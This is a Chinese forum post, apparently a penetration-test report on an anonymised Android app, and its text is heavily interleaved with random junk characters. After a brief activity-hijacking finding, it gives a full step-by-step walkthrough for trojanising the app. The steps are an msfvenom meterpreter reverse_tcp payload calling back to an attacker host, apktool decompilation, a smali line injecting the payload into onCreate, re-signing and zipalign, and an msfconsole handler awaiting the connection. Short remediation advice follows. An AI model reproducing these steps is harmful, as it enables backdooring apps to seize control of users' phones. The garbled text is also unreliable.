6 w) G: d$ v* v L C: f1 I1 |/ {6 O+ M5 ]4 g 1-2 测试结果 - T4 h2 S8 W: o9 s 2 a2 }9 G' t; u5 m4 ?9 c9 d% E S

- O. _2 e: u2 v, ` a2 T ( _ v9 C% N7 l. Y

+ }) s( Q, l; s& ]$ f2 j$ T 5 a& F3 H f. z5 d- b2 J   1 v' m' Z1 q) r: f- }) S ; f c% P* L6 S% ` _+ ^

7 W1 F* `1 W" s( m 0 _9 h3 m) f3 x0 R) W5 ~2 h

+ ~) k5 c0 ^& V( H `- z2 D( C5 _3 d% A) |0 G 2 检测结果                    6 W: g8 Z/ ?4 o& w 7 m$ g$ `4 J2 y% p; x5 ]2 x$ S# {* o

( r! y& P& Q7 m8 N1 Y* g* X O7 c1 Q4 O3 W' Y" V9 N) y" ?

; D5 |' D' T2 \ i t5 n " [8 ?, u4 b) ^ ?1 D1 q. r6 L# ` 2.1 某某某 * A2 n1 }. k' _" F5 V/ C: S u - G; _$ G6 G+ T3 x! e6 f4 j) S

* i+ w1 X0 Y9 i- P$ q" i' W7 T2 n$ Z/ N0 B

7 J9 Z6 d H5 T! f x. u% {" X & M% B" h( Z6 s 2.1.1检测目标 * S1 m5 _8 W' |. x4 T- l - ?! T2 C' l* T3 J$ r

2 P: u# f8 K7 T 9 H" ?4 e) H: V) j

$ K) n( r' N+ g & [7 m, R9 }/ a" }) x+ }6 `" b1 G2 n 目标地址: 某某某某某某APP " H/ X5 V3 O& Z) u* i) Z 4 }3 Z7 q) c/ U. i! o+ X3 D

$ W/ s; Q& s. N: R" Z 3 M7 }7 I* l% L: j& _2 H& `

5 C4 h% l5 | u& |' R& }( W5 Y2 C+ e+ _1 ] x8 a1 } 2.1.2检测结果 4 h0 H* \9 x6 a" x7 ^, A 8 b' C5 B7 @* U% ~

9 |# F8 K! S- S6 n/ D, t 7 b' p$ D! r6 U) o" B2 M

1 a5 |: C9 ]# K* \/ F l * {: z( ^5 K- r6 R, ? 2.1.2.1 1 m/ x {4 B6 D. C8 p* ]9 d+ R 0 A: P8 G8 q8 o# k* q0 x0 s

; D! d- f- k# v/ o: D - P3 G' t2 C2 ?4 H* |: A

D c" f! J0 |9 ]) |0 b/ Q: y; Z$ o$ ], U3 A; o 漏洞链接地址:某某某某某某APP ' A# Q7 ~" n5 w( e ) L* O4 c6 s) ?, j" j

& }, ^+ M3 s. _+ y3 a k9 Q; Y |5 G) ^5 i

8 A0 ?% B8 p7 V/ t- J : p0 W5 J: t7 g/ N! U( R" L5 G   $ `; e2 ?6 F6 w6 H6 n) i% l) ?" s' P8 o4 d$ Y$ A! M z6 @" G0 J

: x3 Y! L& C3 g/ U6 b8 h b/ O1 j9 L$ k0 r% }

/ ~" X" O1 k3 }/ ~4 [8 P" X0 @3 o# V! g2 a; U4 ] 漏洞分析及取证: & s4 x; L: U7 \8 l# b3 z% S; \( a 5 C X2 R# }# r2 _8 N* B0 D

8 y, r0 `8 K+ I! \. Y3 m' s# V7 m 5 q* U1 H$ j& i R* }

5 H5 K, p- L3 s% d% f 6 S( V" o, W5 r' q& J2 U                  通过androidkiiler反编译,发现app未进行安全加固, Activity com.minivision.cmcc.activity.SubActivity可被劫持,复现漏洞如图: , R v- ], m- N* \0 v2 X2 Z 5 P. `. O% p, [$ N$ _2 Q0 }( ~

: B6 P+ p9 {; C7 Q) q$ e, D+ H. \" u H

, }; ^3 p' E1 n# P' {& ?0 |5 f9 h% V/ y3 R+ S o6 ]      2 w0 Q0 O& s4 U" n: T; V7 j$ M2 J3 ]) Y# k0 T

% ?# |: `5 P( U7 v8 s8 W) [* N- [6 }' Y1 y4 H2 F* b/ Z! d

: T* J* _1 N8 F. I% b& L9 H 4 l w' \% _3 ^8 a( r' I                       # n* r+ V; z l1 B2 m) b ! L, z4 b, T7 b

: @9 w; {( u$ [& K* C 3 ]% G+ x7 A+ @. F& ~( h9 Y; ?

% C! M, n$ z/ ` ! x% q! E2 a9 u, L 5 W/ T: k# v8 q# D' d" V1 H/ _ 0 w6 W/ ^: l) ^! g) L) o S

. \+ u2 C: [8 P/ r' t " Q- M( j. V) Y V! F

, L, z! }$ h0 t) c4 N: ~ " L; V6 O3 n, E* ~) } % i' Q; i9 D8 P0 [# z' |% K8 y( t1 K. I0 A 9 ?+ ~5 Q/ ]; O7 o% |

3 o' Q. A% c! [/ T$ v9 M2 r' e: l+ Z6 H ! [: e, }5 f! `# b% c% k& E* M

, ~2 V5 D. r% h" ], E' e5 g: C4 C2 k9 R! s+ d4 b 0 E5 R" x. D( I+ c/ K5 } C3 Q. m% f4 f

( b4 g! Y/ y7 T: N 7 h! x" X7 V5 t2 J* ?* }* h3 [* I

8 w: W' Q5 Q" y- _( D; d ! S$ T3 F7 O3 z4 Y4 Z# b2 ` 漏洞危害:高 $ q% m/ }: E* r+ u0 o6 h0 a0 o( _; |$ x8 X) _

6 @8 ]. x/ p+ F6 S% o* o- ]/ e+ g. R2 ~4 `. ^" E( e8 U
& y4 v& p' j a! _' e1 m" C8 @2 F9 ~1 W8 _( p) w$ y5 N9 E & h7 s, `- v1 a5 a8 ~/ P4 O' V* D$ }: h z) h1 c+ {% Y+ i( J2 u) _$ X. L; [7 n/ S0 R1 @; z T: c e5 T! P8 I6 D0 M0 }$ x7 v; j9 D+ @% B/ X* f( m5 `+ E7 s# I; e# G8 L- V5 f+ H `, t( _, _' @% y" I. p& t) w$ \; r5 D ^7 y( y' I5 o+ A) r" N* `! a$ \+ Y5 }- v# l1 u, C1 c$ \4 H: H$ l% v6 V; Y6 V) N+ v& V$ H. m+ d# j& Z$ d3 X4 p3 B n% C @$ Q }/ e6 s$ A/ i) H3 \: S. @- | k* l+ y) X" J+ o; q. u9 w$ {0 ]% r5 a( u% T& l: _. v/ ^0 i7 C9 q! j* H8 V0 |1 a; Y3 _% G7 \7 I6 ^. q' ]) c( ]& e; Q5 r3 U, U* u9 N5 p0 x7 t0 ]& ] r# l# Z6 n* m0 b& z. ^5 G4 M, o3 L' T$ s5 x7 e" h# v/ x) q% ?$ i" A7 @$ j8 ^* u" O0 P: S
' l6 q7 B2 X/ R1 h% v7 M* z \: C( A- E; }

3 M! s$ C0 |4 c. Z4 T) w4 m. H/ d# X3 K6 s3 D 严重程度 ) r( Q& y# A( k! w" h1 Z$ E * i! `' k0 E( M, ?8 S& ?% h) c: r

# i k: n! S7 m# x) _0 s * D; ~" S1 Q+ I; x$ n$ Z3 E x; ~ 		7 h7 x/ ?: `7 h, O8 f- y 8 K! Q8 ]6 d- m5 g

! Q& i" I# i5 H + G# s! p+ H6 Y- g, o9 A $ a- r2 e- U) G$ Y% Z" w - P) H' l* `$ N, N( A1 b

4 l' Y! b( ]/ V " d' ?' i6 m: Q8 ^+ u+ r' ? 		5 O6 V, l3 a3 f) n6 I+ W ( R" n% l5 Q5 Y$ Z' }# v( h" {8 q3 n

% ]! V1 v1 b# N G* R 5 c2 g, C" [+ b) g# M* p8 a2 T $ V# e& O7 ? g7 w _ + ~4 w9 M6 n1 a9 a$ M

5 D; d' W8 p8 U1 O. X5 _5 v [8 q+ d0 S5 X 		. p* a9 g% L+ e: ^ S2 G i6 J m6 U0 [: J. C! s

% u& u6 x. {( y* ~9 \3 {, b" O- F- B! c : r+ J, Y) s, _- Z& l, y . P! i( T1 }# v) e

7 }2 v" e+ y0 }2 N & Z8 g( X# u B K& U+ Y% h, g 		: ]% u P6 _& ^ P5 E 3 h: t) i9 I E/ }- P/ n6 i

+ ]( {' e4 p' w5 D8 j( T' \6 L0 j e* p1 Q   9 W" {4 Z1 r0 o( M( R- A7 W0 i; \ 0 O' k5 \/ k6 O. K, L

" U. \- J+ X2 A0 J! s ` 1 v- j, u, r! |1 b! A 		1 ] [: k( F; N: K3 m( v) e3 L7 G8 f

) R7 a, z5 l# a. d ; m) k/ l2 m/ ^" K7 U . D# U$ J/ [5 A4 ` ( d6 K% I8 |# K+ \& c8 {

# I1 w8 ^6 R3 s9 J9 }0 B & f+ e2 A% b8 L& g, ?, u" n 		- }2 a1 ]6 _3 Q 9 s4 _) |. L. d0 ?8 U6 l5 \

" Y% _9 g2 I( J. g: A 5 p6 H0 q+ ?; ?0 ]' d, h   5 M$ z8 U$ \$ B9 @3 w" f 6 s( D1 c# Z+ ]1 a Q- `

' `) X4 i: h% t% l: E( ] I5 u3 n) A+ o3 t
$ i6 G0 H8 U$ Y; B5 s, u. k4 U4 Y% {; K y" @) x
( u7 k3 _6 {4 l9 x5 | 3 t. K* K& f& U3 ]2 l

% G! F" E5 W! Z, K. I5 \# I1 Q: H0 x* K   , _' e- r I2 p' l9 k( i& ^# Q / B3 Z: E+ k5 Z+ W1 n9 |5 n f1 D+ f; m

* B8 o5 N G+ v " J$ Z3 J$ D* f! G3 m

& s2 F9 z% h5 M& E- \0 |# @* d 3 C( l& Z# @. k 修复方法:在 APP Activity 界面(也就是 MainActivity)中重写 onKeyDown 方法和 onPause 方法,当其被覆盖时,就能够弹出警示信息。判断程序进入后台是不是由用户自己触发的(触摸返回键或 HOME 键),如果是用户自己触发的则无需弹出警示,否则弹出警示信息。 # F8 ^& A) E( ?; M ' x' _5 d" r9 x/ K

4 p/ o+ _- l9 t4 \5 B 2 h) T9 c* m& Y7 M+ Z% h

+ V" n" d8 X) P( q" S$ M; Y+ O; _4 o) L% ?- B) n- R           & ?9 M: g) O9 `- P: y) w& n" _ 9 ?0 ~# {# {5 \8 L: G" d/ `9 e

3 j4 J: @ e# t8 p3 U/ h/ O / r) N& N6 V# i3 p* f6 _/ @2 Z6 K

% r2 o* u" \; z, K, }+ m$ m 9 c# _9 x" y# {: G   3 S* l/ B* C, m9 w0 e! R ?/ h5 i1 t" d" M, B" \8 [

5 f _1 k& q: `: e) y $ r) o! H8 E; L$ q% d ~0 U

" G; u0 F: m. E$ e) q$ o# ]7 S( _, U) L6 V% I! M/ ] 2.1.2.2 0 A9 `/ W0 {# {) { 7 \( k/ y1 b4 L' t' E# l. `# W9 ~; v

. L7 R: X a5 o M5 ?) z) Y+ e ' s# i! I- L- x$ [* d. p4 i% [

" E( c; m% R# _9 {$ t' g) [$ J 漏洞链接地址:某某某某某某APP ' K1 Q# ]8 u# t8 e# Z& e! k* I9 A3 E. E! i" i( \$ F3 y% s u

( C4 c" S& Y. h3 @) A1 A0 [2 h0 F. B! s2 |% @

; y. p3 _# C1 z* n. k1 `. Y! N # ~/ J& g/ x" k, [7 M 漏洞分析及取证: " U+ L8 E C4 _: V; ~# n : T6 k: N, X9 G$ r

. z# x9 g2 {* R9 N% w4 e) c , T' x/ M, C" {

9 W. U& Y4 \9 h+ p' n 4 R8 [2 z! I! k7 q) J7 A4 X6 R                  通过反编译,发现程序未加壳加密,可直接反编译获取源码,经过测试可修改app代码捆绑木马或者植入广告等操作,复现详细方法如下: 9 j" t4 l# Y4 I 9 o8 d: |3 E1 e; R! i& z N

- ^2 F7 Q; X6 [7 J9 z7 n5 m& \, N+ t; F4 D Y% h: L

6 f$ d6 K+ A$ Q, K) A. m5 @; S) j8 D. G) q. n Metasploit 生成木马 apk % V1 e9 k( D7 i4 U . B2 _; S; [: w$ H2 c

! E R; l' t; @$ M- f " z* ^! J* i5 d, V( M9 u; Y! h5 M

! V$ ]# ?7 X/ r : F8 z* U% H& Y9 `; T5 A* c msfvenom -p android/meterpreter/reverse_tcp LHOST=192.xxx.x.x LPORT=4444 R > cockhorse.apk " q" R. L( Q* Y/ T, u" X6 ?9 C+ J& M4 W( K! u2 L

u/ N' m# \" _2 F2 g: u ; D0 z: k3 [+ o! p

1 w/ @! O8 X% z0 [) q6 G+ w( Y, ^) d# I% g4 D! e 反编译目标apk和木马apk ' X6 F# _5 i" K! n* g 6 l1 f' V; P2 R" j2 J, {

+ N# w$ ~7 O. H) n1 j' ^4 R" ]$ t6 p! @6 L/ J0 ?3 G

3 h0 L, ?! O7 L( z4 \) Y. ?; {% B- i8 g" T. X5 H6 L) s$ H apktool d target.apk
/ ^. \8 z( M$ S/ p9 s& ` 6 L5 |4 W- I( n0 a6 e S- X8 E8 H$ s apktool d cockhorse.apk " Q/ D% E6 L1 J* n& h7 q4 w! n/ S5 f& o6 l) I$ z

. ?) L6 x! e6 N u! s* s3 c; S- V& r9 q' V

: w7 d: m0 i. y$ T / M# L- J |! w9 w. q7 ~ d# } 木马 apk 注入目标 apk ) K: A9 b7 P# A# n8 Y4 j0 Y6 q# n* e8 L) N: P6 o

8 U3 S4 c$ U) A6 n. i! a- Y/ z5 C& {

& Y/ y. D1 A. t; f ) E# ^0 |3 w8 T; O& |$ k# G 在目标 apk 反编译生成的文件中找到启动 Activity smali 文件,并在 onCreate()方法中添加如下代码:
1 d k9 \( a" W. M! y( ~ % G9 i) _* h& @; G invoke-static {p0}, Lcom/metasploit/stage/Payload;->start(Landroid/content/Context;)V K }' g8 s9 |: Y1 S5 k) |+ ] Y. s- T/ {6 c6 z

O- y. C! p) j4 M# p " ~$ _9 W& l% A! P K

! m: _7 R* G0 ^# c6 g# I r K1 E8 B: t' Y' m 将木马文件 AndroidManifest.xml 中的权限放到目标文件 AndroidManifest.xml 中,去除重复 ' A& ^6 |0 I" j3 S 3 M: _% \, J0 ?3 c

( v! }' U8 A5 |0 K1 A+ J b/ ^6 }% ^7 G' v4 G- Q

. M1 o( T2 T" M w. ^% t2 T $ g5 x9 l& b$ y 将木马文件的 smali 文件放到目标文件下,例如 com/metasploit 文件复制到目标文件 com/ . ^, Y% ?" s# o9 D0 o 4 n" ~+ G( H9 D' Y( D

9 Q; h! e* ?2 o/ k8 p1 | 6 t8 \! R; e% _: g) p

- X" {6 R7 |9 b; c! b! [ 7 ^1 |3 d8 T9 i8 f o' @5 H8 q/ P; \ 回编译生成最终 apk 2 J" p& M) N2 v/ z! H2 t5 @6 T : O$ Y, [$ F" q- z5 Q

/ A" j4 D) B( @( ?, M3 N 2 M B# _: b) y U! v3 y

3 X7 i: R, y1 c 6 H! |( N! D% y% `+ H1 w2 w8 L 重新打包 & [ C" I2 Y- x8 @2 r 1 V2 z' ^; b& Y2 |' s; w/ i5 [ ^

3 s& |) `- F- O. q# b: q3 P1 B$ }; P' z6 z4 [" x# J U' Z

% r- a3 U B- u2 V# o, n1 `9 S ' L: l( q+ u# B9 ? apktool b -o repackage.apk target_app_floder ~0 n8 X2 D c . e5 q* [( A4 H, K& p9 \

9 ?) c. \ b, [. P/ c: I7 ~) `, w% K& U/ @3 ]9 p- x

2 P! P! Y! y1 G. N* a. K! T" N3 H 创建签名文件,有的话可忽略此步骤 ; v& ?; ?+ H, ~4 F. @5 I6 _1 N7 p " }) w$ H2 d* K L, o- w

+ @) @8 P9 u0 F+ }' r( C v 7 x. a, x0 m' h; v9 n2 m! W

: z, ^ ?. N) t - O( o2 J. g8 q keytool -genkey -v -keystore mykey.keystore -alias mykeyaliasname -keyalg RSA -keysize 2048 -validity 10000                9 P+ Q# T$ n9 R# _ 3 \( X* O0 Z4 B: j: o# r, s9 c5 C

) a$ b) C7 y( V" t, ]; S. W+ E/ D + R8 V: i2 M E5 ?

& t9 n5 H+ h% \( g2 e 4 L, j& W) K. R0 g |( @" i 签名,以下任选其一 7 n0 Z& a2 ^9 f$ K3 d . q) }* V0 z% [

+ N% E5 P& n9 C* i & m$ a+ Y7 c+ L7 D; H& t

% K1 n' P2 g; A2 G9 |9 ` w! W# ?; G# Z% G' S+ N jarsigner 方式 4 b; ]. _: b- \( D) b7 M2 r : m8 D2 k3 s t9 z

* R% ?* V0 O1 y5 k* H3 L, j4 _8 t5 \# U Y# H; y; s

5 F' Y' P" ^9 e8 c4 W: Y2 r4 g( \ 1 D, F2 f) p. A4 Q& v! h jarsigner -sigalg SHA256withRSA -digestalg SHA1 -keystore mykey.keystore -storepass 你的密码 repackaged.apk mykeyaliasname 5 o& D4 e* `5 T& e% E ! g" Y) }2 \6 M+ i* j

- s$ K$ W* }9 n 9 ?- c) @9 F$ C9 R1 Q

! X$ ]( C* T8 z & g; d5 m* s5 D apksigner 方式 2 L. \# M U7 J- e- i/ Q ) A; w, G$ T: O1 H

, V. U( M& n/ N* w8 P& i - h4 T! n+ _5 J) R

3 e( \/ @# w5 N, G0 T4 q V- W; E ' _& G. U9 D( G4 ~7 M- T apksigner sign --ks mykey.keystore --ks-key-alias mykeyaliasname repackaged.apk 4 }2 W, }' ]" t# p: L! h j+ [ 8 l: s1 l$ ] ?+ z4 c1 I

. J) ^6 p. H) K8 o* z3 X5 I% S! K - S c+ [/ K; l! }& N$ S

" P& y( u" {) P; j9 y5 X2 A* P1 t9 _ 如需要禁用 v2签名 添加选项--v2-signing-enabled false ! o% m$ x/ G: n" p6 J 8 C5 ^9 M6 Z8 B, v5 ?$ J# Y

0 w! M: O c# i, w3 N/ o x 6 d, p% Z3 y) ]. H

2 L5 F% D; ] ^- ]; C) b& I$ n" F+ K5 p 4 r) H( }7 C& S% C 验证,以下任选其一 4 _ `! P# Q& w; F7 ?6 ]: U7 C 1 e- x; A0 x* a8 t) j9 h

. [8 B4 a2 p4 m! i, } - |: w$ k5 c0 A

: M8 V2 \1 Y4 m$ m0 m* ]2 W: S 9 v/ a8 ^1 e M# D jarsigner方式 : x% S- O% a- r" H5 L$ U# ] 0 s: I- K6 |5 E

9 j! m- n9 r* j; i1 {8 X/ g, D/ a0 H9 ]/ b. H$ {6 z( n

) L" T8 N, p8 K4 n: q8 B( S8 Q & J3 J* P2 I2 b jarsigner -verify repackaged.apk 6 _' Z' _( ]8 Z: n- D8 d ( m: X+ \) s7 W' K

% T9 B) k/ ^4 I: c A+ x% R5 h3 N* q Q6 m# L: E, F

6 h* N/ }& g4 H G, } 1 o$ `; d) m4 _, Y apksigner 方式 # G4 J0 v3 [' o& @. I" @! d , [& h: q# s1 v; w# N

% l3 O' q5 B/ m2 M7 F & |- J6 d# N+ N6 f" p: D& t0 ]

2 n# X$ a# S& u8 z , R( I7 m+ P' ` e" b apksigner verify -v --print-certs repackaged.apk 4 g, W+ h5 {: n |2 N: E* _& \7 y ; e) ^& F' T( }% \8 B3 F) p

- Z$ s8 W T% w$ L: t& x7 P0 v 1 }4 K! Z1 Y! [

& E8 l0 I3 Q8 i * ~; G* c+ P3 O9 l keytool方式 % ]) O. m: D3 U$ q/ u5 O# e* k) ? 0 A& p( |" g% ~; n5 ~+ l

7 g( w. H( C3 u ! [1 b7 ?9 F9 m. d9 ?3 ~ [( i

1 _4 _, k! U9 j4 f a4 |. C# g+ h0 q! g keytool -printcert -jarfile repackaged.apk 9 w! J( J: b5 |5 y4 X8 ]/ l , K$ ~. F& P7 W) L \+ }0 _2 Q

5 ^) K* c0 B" p# Z + t6 D% [& L$ I5 [9 h

9 L( f% n8 l# m* D# }( s 8 ]: H" h1 |- u) S 对齐 & ~5 d) }; ~. c, G # F% I, }; F% q1 @8 ~5 }& x. ~! l

! e) c" W- v% }4 ?* r3 G% t6 _5 U# S; j, }0 `- ^

$ @. R% ^$ A$ g* e. q4 F$ F* x# K/ P s7 l H( s2 h2 a W6 M% D% L* p 字节对齐优化 ) U7 _; V' P/ `/ l3 \" P8 k ; H3 R! y+ D1 m6 C3 i

5 E6 g* z7 @: x8 M, D- G* o 9 H& I# |- {% X4 {/ o- z

9 {* H4 Q) p1 R1 G$ E* ` 0 r6 D8 E1 }9 ?* k zipalign -v 4 repackaged.apk final.apk 9 x& ]( \3 N n3 m7 m- v7 j$ j3 B0 A7 g& G! z

/ F* V5 V$ [! J' K1 w1 X7 Y& j . P) N2 z8 ]6 a8 x1 V, I

) m0 B# e4 }& @3 |! e3 l- A9 P- g - s/ F* H0 A, o( n5 Z& Q9 d 检查是否对齐 " H$ h3 r; r: F) o $ b" d' q. J- o# O; V9 n

! H P9 N0 t8 c* k: k, r 4 `$ T" E. K% M7 C, K" q' e

. q) X' l' j8 R5 Q6 l! M0 d5 B3 V. r$ N3 V& N( v6 p! O zipalign -c -v 4 final.apk . J& o4 Q* V' b" F+ C9 i9 j 6 _2 {+ F4 ?8 F5 T

9 I) y I; V5 ?. H" E! u Y+ q1 z) o" N5 e; c

; ~8 z+ p" J$ V( w ( W" w2 a9 b& [: ]5 p 注:zipalign可以在V1签名后执行,但zipalign不能在V2签名后执行,只能在V2签名之前执行 5 O. i/ n$ c2 y1 o# D8 h ! F+ _8 T3 E: i* e/ f. s7 d

1 K0 Y% b; l$ ?% n * u! @5 r* I3 L6 K7 z8 }

5 e& r# {$ h3 B+ C+ C: }0 a- r) p. C: m- K* O3 K7 e 启动Metasploit控制台,配置参数等待上线 1 Z& Y' b" F5 f V$ [& C# u8 z4 z. \1 A! z; e7 f' _

' V: W& C( q% O Q1 k$ D8 n# T - Z4 p6 g4 V6 W' u

@9 j: B/ N$ E+ `. H, m2 m: A8 W 在终端依次输入如下命令 2 T9 g$ Q* j2 ?, X* e # X0 ^( P. ]5 J( u& |$ ^% C% J/ B" v

2 T% {$ T4 b, g0 v : h% n4 N- |- w% _

6 G$ ^+ D% p$ {: O( S9 t2 N) F) m msfconsole , t4 z, S* X7 R* ~ 7 I2 j1 K) O. b+ \9 Z- n

) V- j2 \- J9 i' d% G + t( ]3 m) j: d1 ] |

2 ]2 u5 t+ F9 m L : W/ Z. }6 [& W# D T' c use exploit/multi/handler . i- N! w2 ~, Y- h1 X( z , m+ Y# E w) S# B' k# v

( S6 L2 y1 s6 d3 I: v) U: F5 ] 8 r1 R7 O5 {/ X# s6 T6 |5 s

, n/ o: Z" z1 b1 q. A4 l2 ?5 ?- J: |$ \ 4 D% |/ K" H! C7 ]' O5 s set PAYLOAD android/meterpreter/reverse_tcp ' u$ D5 o. @- x, t& G! K9 X- ?0 T* @8 Z4 h% y

* ~' O9 ` {5 z7 Z - O6 `* N1 r5 N5 g

% p$ B5 N: \: V# q. M 9 ]. A$ m9 H# R; p% s set LHOST 192.xxx.xx.xx $ J! O" ]; } h( {, j. _) K/ B V " E# q' }/ Y: R% l1 a

& o7 M' \0 s3 j0 T( P8 {1 I8 q 6 U$ V- q% N- V; u& j; i

2 l5 E. E- t- k# K , _ {0 V4 L! ^( ` set LPORT 4444 - t, W" h. j0 W# {5 S/ s 7 {; {) |9 R# b& i; \

: t8 r- |9 U* R3 l4 d+ b+ j- U' F6 ^- J" s+ U

: i2 _1 e7 f; P1 q3 A* d7 u0 \ * I6 a% o/ D- P/ h* o, u* N& q exploit ) o& O! y+ H% C7 _; M0 a2 @) b/ m7 r 4 z" P, A1 t, b) y

* \7 M# @. R4 i* d6 H- t% b. R6 ^$ i* i

6 `5 b6 g6 r1 q" Z0 b " y/ X% u6 K2 F; m 之前我们把入口放在 MainActivity onCreate 方法中,当启动目标应用进入该界面,就会连接成功,如下图:               8 G% l* _+ O" K3 N9 S1 ^0 M, x- E/ R/ q. A

/ W1 D E" Y1 S; t' y3 c- @% B 5 j+ r3 Q3 T" n1 e) a! g8 u _

% L+ p" f0 j; Y. [7 F ' m! W$ o" U6 ?/ h% C0 M2 y 漏洞危害:中 3 f' ?* S; q O, c, Z# K , n" p$ y9 } c0 i) H6 Y

! u( O2 u. i) ]0 z , [; b+ U9 H# x a) { B
" m! I/ ?6 V% o3 k. @: }+ }! k7 X4 h' N( C9 J0 m# t2 R - ?5 y7 r% t' V1 a! z 8 S T" `2 Q# E6 a' D' Q! b5 I , [) | M: m' L; ^8 X/ H0 P* P0 G1 ~4 l8 ?. @2 E) V2 t! i1 ~/ P5 w3 m3 v3 Y: @7 O( D, b. q6 |- f- ]! I$ i8 e' i. h: @6 w) J Y6 a1 j6 v2 o4 f o+ r! x" O6 c. m) K; u6 a6 }/ A3 Z+ @9 m2 T) k9 [4 e5 K5 `* D4 D" P6 q1 t6 |7 S0 K) t. o" D& B, b" ~1 n P. `, a/ o# D! w: L, o* s1 e1 q0 M: i) n: M5 V8 F' |2 _! S9 [, h$ y) k2 o3 k, `1 Q4 o/ }9 G1 w( g* ]" o% u. L# {- m8 B5 I9 N# d2 {9 ~% K) W" V" Z% Z6 j$ V* a/ D& ^ k5 e, ^' _$ `1 d% \% a) Z8 t% g [+ }6 z. Q8 T0 o" Z8 Q& }9 }' `8 c/ a/ M$ m& ?. u6 K* j2 S' w/ Z4 E2 D7 O( y- [4 D( t& ?1 O" S4 e" {/ W0 R5 O4 @8 d; l+ K# e$ u: j8 Q |8 b& @: n( z* ~9 V
/ r9 i i+ }6 X, Q+ W4 V 1 j+ o& Z! z- @: y- o. y5 _

1 E0 g1 }/ D9 W x5 v8 w9 d3 T: H1 G- Q9 l 严重程度 . s; d, @6 }1 R, t: G: G ! y e! ]3 I' K" Y- \

' E8 H8 o: {: Z6 E7 b N# \2 h- a& T/ K i6 ^ 		' U$ s" J9 b. W' y4 g! P: A3 C7 l/ d, c9 D$ q

! X- z/ U3 Y L/ i5 R. w( z8 z 7 l; b6 G) f! L3 d5 M; L " P ^' n0 ^0 O( L+ x4 b8 E9 E; Y 7 f3 _1 g& P" Z/ q

0 V: Q: m9 D x! N. `' L " `2 @; @4 |+ s2 o& \- T 		, ]8 L# k# z$ x6 z 5 z; O* Q5 H# ]& v8 @5 h

3 P" t" I' t, K3 F 6 W. e& O' ]3 y/ n! J" J # R1 Y& t. K' p0 O0 o7 A9 c+ J8 b$ H $ Y. b \9 @- C2 c; I9 F

) R# n. S3 q& X: p V$ r$ C; x" V* O: C& L% [* j. X4 M 		, R3 g$ P7 F$ ]# z # i5 m( d* J' l9 H( L

2 i) R E8 ]3 ~" s 4 ~ N) \, W: m Q$ Y8 R- m" L8 ?0 G 2 ]3 F# e) `! q3 D ( `1 ^1 _5 I7 G- ~0 F

/ E/ l B' m, n' ^. z) ` : X; P" Z) `/ i5 K 		" a" u0 E. s. \7 S S3 i' m& ~! X% e6 E# a ' e) Y' e$ e* \( o 0 |/ n# K% v7 P, |/ q$ ?* i

4 o1 k: h7 k& v, @1 a1 `: [7 N% O: S* D. P- ^7 u   $ F: D1 l( u# w$ [ e3 ?7 e4 x8 k) u( r

+ [# y5 x7 \/ V2 b) c + D: N6 S0 A% e& {% b: ~: f' q 		8 |/ k, y. t. Q) t% t 7 b, e1 o3 f1 K3 ]3 c% v: U8 ]

3 X3 V% ^5 ?* {" w" R7 v 5 G- L- o1 P# B7 O. |% r9 m ! O4 L. p9 O$ J$ D1 L# v$ y , j' \& [* q9 ~, U& N' L

% X4 \, o% z" C3 a+ ? j ( w) w& s* p* `" s1 h 		: _; x; g6 h( v. e! f2 @0 q* |. E. I- e- g4 ]7 n2 o : h5 h' w1 s( }, E# j9 u" @5 r8 W, _- S

$ ~, {' f5 s* W' x6 \2 }. y . R$ s4 G/ X! ]& ?) x3 q   3 t5 \% [9 G. p1 e. ]( D; r8 ?0 L" o: Y; l ]/ E

3 m6 N& d, Y `+ x5 n ! `9 e( i Q& ~) B
- H1 k) v* U$ ]$ U, f # n0 v; q1 T r5 e
( S4 P! u, e( ?3 a 3 L$ r. u# ?- z' r) u

; G. B, ~7 P( b " [* k4 r- o; b9 W% V   8 h- L1 f) k7 T! d- {. b 3 U4 G* i" n2 S- b; Q

0 D8 H# x8 L q- A8 S+ g. B. E1 d4 i# C }- f/ X4 w: h

8 L2 l0 ?, ~6 e" M 9 n1 Q3 o5 h3 Q9 m! {. J2 M4 D0 Q 修复方法: $ X3 ^2 }/ z; C1 Z - M& m" S5 K5 u* B. d, b; s4 J

+ H8 r' r, @( G+ n* ]% w ] 7 d* H/ a1 J- s

9 R0 m( p3 }; z+ g' ~' p' A 6 i& v4 y5 l6 W1 c4 w               1. APP 启动时应做签名校验防止二次打包。
+ w$ J" F" u) C ! m( g3 |; N2 q0 D1 H% | 2.建议采用客户端、通信和服务器端联动防御方案进行安全防御。 4 ?: l Z0 {, Y) {7 d) q# I0 i% L4 i

* N6 r) V+ c* a9 u9 C4 D+ t) X }! h. [) B, z/ k& Y ) y' b& s5 I# e6 A5 c; { . f1 G+ d6 x1 o

) o; e" m I! e: ?# `! n9 c" ~7 d* R* q h9 A8 b   ! { y0 ?9 e% x- I5 d$ R . o f2 a% I% D! S4 N( w* U T

( o( n9 H: d$ v9 z& X _ 2 X, u3 H# L- T, t8 c/ c1 u 4 A0 K, |( E$ s. s6 `$ z) ?4 k# B5 x2 S$ o3 v, B1 N

0 g A4 c4 V- h* L! [5 V ! i. L6 c& H+ w$ @" O T' L! Z
# Z4 b4 |' E X& S0 y! A8 F/ X" x 8 ?4 U" v6 |4 d1 k7 w4 f7 @

$ u! x+ A0 K, ^( [( @. @9 w- p! J8 c3 e, R
回复

使用道具 举报

返回列表 发新帖
高级模式
B Color Image Link Quote Code Smilies
您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

Copyright © 2001-2013 Comsenz. All Rights Reserved - Powered by Discuz! X3.2
快速回复 返回顶部 返回列表